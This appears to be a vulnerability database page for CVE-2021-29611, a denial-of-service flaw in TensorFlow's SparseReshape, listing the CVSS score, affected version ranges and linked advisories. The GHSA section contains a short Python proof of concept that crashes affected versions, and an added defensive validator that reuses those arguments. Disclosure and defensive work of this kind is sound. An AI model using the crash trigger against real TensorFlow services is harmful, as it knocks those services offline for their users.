CVE-2021-29611
Published 2021-05-14
Medium 5.5 (CVSS 3.1)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
TensorFlow is an end-to-end open source platform for machine learning. Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure. The [implementation](https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor. The fix will be included in TensorFlow 2.5.0. We will also cherry-pick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are the only affected versions.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tensorflow | — | — |
| | tensorflow | < 2.1.4 | 2.1.4 |
| | tensorflow | >= 2.2.0 < 2.2.3 | 2.2.3 |
| | tensorflow | >= 2.3.0 < 2.3.3 | 2.3.3 |
| | tensorflow | >= 2.4.0 < 2.4.2 | 2.4.2 |
| intel | optimization_for_tensorflow | >= 0 < 1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6 | 1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6 |
| intel | optimization_for_tensorflow | >= 0 < 2.1.4 | 2.1.4 |
| intel | optimization_for_tensorflow | >= 2.2.0 < 2.2.3 | 2.2.3 |
| intel | optimization_for_tensorflow | >= 2.3.0 < 2.3.3 | 2.3.3 |
| intel | optimization_for_tensorflow | >= 2.4.0 < 2.4.2 | 2.4.2 |
| tensorflow | tensorflow | < 2.3.3 | 2.3.3 |
| tensorflow | tensorflow | — | — |
GHSA
Incomplete validation in `SparseReshape`
ghsa·2021-05-21
CVE-2021-29611 [LOW] CWE-20 Incomplete validation in `SparseReshape`
Incomplete validation in `SparseReshape`
### Impact
Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure.
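```python
import tensorflow as tf

# input_indices is a [1, 1] matrix: one index with a single coordinate.
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
# input_shape has 11 elements, which does not match the single index coordinate.
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)

# On affected versions this call ends in a CHECK-failure.
tf.raw_ops.SparseReshape(input_indices=input_indices,
                         input_shape=input_shape,
                         new_shape=new_shape)
```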
The [implementation](https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor.
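
A caller-side check for the condition described above, as an added example (not TensorFlow's code and not the patch): it reports why a set of arguments does not describe a consistent sparse tensor, so they can be rejected before reaching `tf.raw_ops.SparseReshape`. The function name and the plain-list argument format are assumptions; the first sample mirrors the advisory's reproducer.

```python
# Added example (not TensorFlow code). Arguments are plain Python lists,
# e.g. what tensor.numpy().tolist() returns; the function name is hypothetical.

def sparse_reshape_arg_problems(input_indices, input_shape, new_shape):
    """Return the reasons the arguments do not describe a valid sparse
    tensor; an empty list means indices and shape are consistent."""
    problems = []

    def is_int_vector(v):
        return isinstance(v, list) and all(
            isinstance(x, int) and not isinstance(x, bool) for x in v)

    if not is_int_vector(input_shape):
        problems.append("input_shape must be a 1-D vector of integers")
    if not is_int_vector(new_shape):
        problems.append("new_shape must be a 1-D vector of integers")
    if not (isinstance(input_indices, list)
            and all(is_int_vector(row) for row in input_indices)):
        problems.append("input_indices must be a 2-D matrix of integers")
    if problems:
        return problems  # the checks below need well-formed containers

    rank = len(input_shape)
    if any(d < 0 for d in input_shape):
        problems.append("input_shape has a negative dimension")
    for n, row in enumerate(input_indices):
        if len(row) != rank:
            # The mismatch in the advisory's reproducer: 1 coordinate vs 11 dims.
            problems.append(
                f"row {n}: index has {len(row)} coordinate(s), "
                f"but input_shape has {rank} dimension(s)")
        elif any(not 0 <= i < d for i, d in zip(row, input_shape)):
            problems.append(f"row {n}: index {row} is outside {input_shape}")
    return problems

# Constructed inputs. POC_ARGS mirrors the advisory's reproducer as lists.
POC_ARGS = ([[41]], [0] * 11, [0])
VALID_ARGS = ([[0, 1], [2, 3]], [3, 4], [12])

if __name__ == "__main__":
    for name, args in (("advisory reproducer", POC_ARGS), ("valid", VALID_ARGS)):
        print(name, "->", sparse_reshape_arg_problems(*args) or "ok")
```
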
### Patches
We have patched the issue in GitHub commit [1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6](https://github.com/tensor
OSV
Incomplete validation in `SparseReshape`
osv·2021-05-21
CVE-2021-29611 [LOW] Incomplete validation in `SparseReshape`
OSV
CVE-2021-29611: TensorFlow is an end-to-end open source platform for machine learning
osv·2021-05-14
CVE-2021-29611 CVE-2021-29611: TensorFlow is an end-to-end open source platform for machine learning
Debian
CVE-2021-29611: tensorflow - TensorFlow is an end-to-end open source platform for machine learning. Incomplet...
vendor_debian·2021·CVSS 3.6
CVE-2021-29611 [LOW] CVE-2021-29611: tensorflow - TensorFlow is an end-to-end open source platform for machine learning. Incomplet...
Scope: local
forky: resolved
sid: resolved
https://github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6
https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7f